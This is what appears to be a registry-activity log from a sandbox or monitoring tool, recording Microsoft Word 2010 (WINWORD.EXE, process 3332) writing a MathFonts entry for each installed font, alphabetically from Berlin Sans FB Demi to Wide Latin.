WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
1
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Fixedsys
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Sans Serif
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Serif
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
3332
